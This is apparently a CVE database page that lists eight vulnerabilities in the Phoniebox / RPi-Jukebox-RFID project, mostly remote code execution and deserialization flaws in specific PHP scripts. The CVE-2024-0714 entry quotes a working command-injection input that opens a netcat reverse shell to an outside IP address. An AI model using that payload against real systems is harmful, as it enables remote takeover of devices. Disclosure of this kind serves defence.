Phoniebox

phoniebox

Vendor: Sourcefabric • 8 CVEs

CVEs (8)

CVE VENDORS PRODUCTS UPDATED PUBLISHED CVSS
CVE-2025-63951 1Sourcefabric 1Phoniebox Dec 31, 2025 Dec 18, 2025 N/A· v4 7.5 HIGH· v3 N/A· v2 An insecure deserialization vulnerability exists in the rss-mp3.php script of the MiczFlor RPi-Jukebox-RFID project through commit 4b2334f0ae0e87c0568876fc41c48c38aa9a7014 (2025-10-07). The 'rss' GET parameter receives d...Show more An insecure deserialization vulnerability exists in the rss-mp3.php script of the MiczFlor RPi-Jukebox-RFID project through commit 4b2334f0ae0e87c0568876fc41c48c38aa9a7014 (2025-10-07). The 'rss' GET parameter receives data that is passed directly to the unserialize() function without validation. This allows a remote, unauthenticated attacker to inject arbitrary PHP objects, causing the application to process them and leading to errors or a denial of service.Show less
CVE-2024-41369 1Sourcefabric 1Phoniebox Sep 4, 2024 Aug 29, 2024 N/A· v4 9.8 CRITICAL· v3 N/A· v2 RPi-Jukebox-RFID v2.7.0 was discovered to contain a remote code execution (RCE) vulnerability via htdocs\inc.setWifi.php
CVE-2024-41368 1Sourcefabric 1Phoniebox Sep 4, 2024 Aug 29, 2024 N/A· v4 9.8 CRITICAL· v3 N/A· v2 RPi-Jukebox-RFID v2.7.0 was discovered to contain a remote code execution (RCE) vulnerability via htdocs\inc.setWlanIpMail.php
CVE-2024-41367 1Sourcefabric 1Phoniebox Sep 4, 2024 Aug 29, 2024 N/A· v4 9.8 CRITICAL· v3 N/A· v2 RPi-Jukebox-RFID v2.7.0 was discovered to contain a remote code execution (RCE) vulnerability via htdocs\api\playlist\appendFileToPlaylist.php
CVE-2024-41366 1Sourcefabric 1Phoniebox Sep 4, 2024 Aug 29, 2024 N/A· v4 9.8 CRITICAL· v3 N/A· v2 RPi-Jukebox-RFID v2.7.0 was discovered to contain a remote code execution (RCE) vulnerability via htdocs\userScripts.php
CVE-2024-41364 1Sourcefabric 1Phoniebox Sep 4, 2024 Aug 29, 2024 N/A· v4 9.8 CRITICAL· v3 N/A· v2 RPi-Jukebox-RFID v2.7.0 was discovered to contain a remote code execution (RCE) vulnerability via htdocs\trackEdit.php
CVE-2024-41361 1Sourcefabric 1Phoniebox Sep 4, 2024 Aug 29, 2024 N/A· v4 9.8 CRITICAL· v3 N/A· v2 RPi-Jukebox-RFID v2.7.0 was discovered to contain a remote code execution (RCE) vulnerability via htdocs\manageFilesFolders.php
CVE-2024-0714 1Sourcefabric 1Phoniebox Nov 21, 2024 Jan 19, 2024 N/A· v4 9.8 CRITICAL· v3 6.5 MEDIUM· v2 A vulnerability was found in MiczFlor RPi-Jukebox-RFID up to 2.5.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file userScripts.php of the component HTTP Request Handler. T...Show more A vulnerability was found in MiczFlor RPi-Jukebox-RFID up to 2.5.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file userScripts.php of the component HTTP Request Handler. The manipulation of the argument folder with the input ;nc 104.236.1.147 4444 -e /bin/bash; leads to os command injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251540. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.Show less